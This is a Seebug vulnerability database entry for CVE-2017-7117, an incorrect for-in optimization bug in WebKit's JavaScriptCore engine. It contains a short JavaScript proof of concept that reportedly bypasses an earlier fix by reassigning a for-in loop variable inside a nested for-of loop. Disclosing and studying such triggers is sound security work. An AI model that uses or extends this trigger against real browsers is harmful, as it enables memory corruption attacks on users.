WebKit: JSC: Incorrect for-in optimization #2(CVE-2017-7117)

2017-10-10T00:00:00
ID SSV:96630
Type seebug
Reporter Root
Modified 2017-10-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                The following PoC bypasses the fix for the https://www.seebug.org/vuldb/ssvid-96629.

PoC:
function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();